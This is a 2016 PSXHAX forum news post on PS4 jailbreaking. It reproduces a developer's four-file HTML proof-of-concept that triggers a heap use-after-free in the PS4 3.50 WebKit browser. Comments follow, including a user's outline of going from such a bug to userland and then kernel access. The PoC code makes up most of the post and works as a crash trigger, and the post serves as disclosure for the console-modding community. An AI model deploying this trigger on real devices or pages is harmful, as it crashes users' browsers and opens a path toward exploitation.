Category PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       29,947       49            
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg
 

Comments

PSXHAX

Staff Member
Moderator
Contributor
Verified
Thanks @proskopina :D

We couldn't do it without all those helping with news in the Shoutbox though... what I normally do is check the Shoutbox from my phone throughout the day, and if there is news then I hop on the PC to post it. :cool:
 

mcmrc1

Senior Member
Contributor
Verified
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^
 
Recent Articles
Sony PS4 / PS3 Blu-ray Disc Drive Internals & Security by Oct0xor at 36c3
Last year they covered Exploiting PS4 Video Apps, and at the 36th annual Chaos Communication Congress (36c3) from December 27th to the 30th 2019 in Leipzig Germany scene developer @Octopus (aka...
Sony PS4 Remote Play: Now on More Devices Latest Promo Video
Proceeding the PSPlay Free Trial of the unofficial Android app and yesterday's Google Stadia release that includes 22 Stadia Launch Titles, today Sony unleashed their latest PS4 Remote Play - Now...
Baikal Support Added to PlayStation 4 Linux Loader by Valeery
Since the PSXITArch Linux v2 Guide, Spine PS4 Emulator for Linux Demo, CECPS4 Linux Scripts and PS4 Gentoo Linux development updates support for the Baikal chip was recently added to the...
PS5 DualShock 5 (DS5) Controller Images Surface in Japanese Patent
Following Sony's New Controller Patent, PS5 Devkit Prototype Leak and recent PS5 Transition Update in preparation for the PlayStation 5 2020 Launch today some PS5 DualShock 5 (DS5) Controller...
Top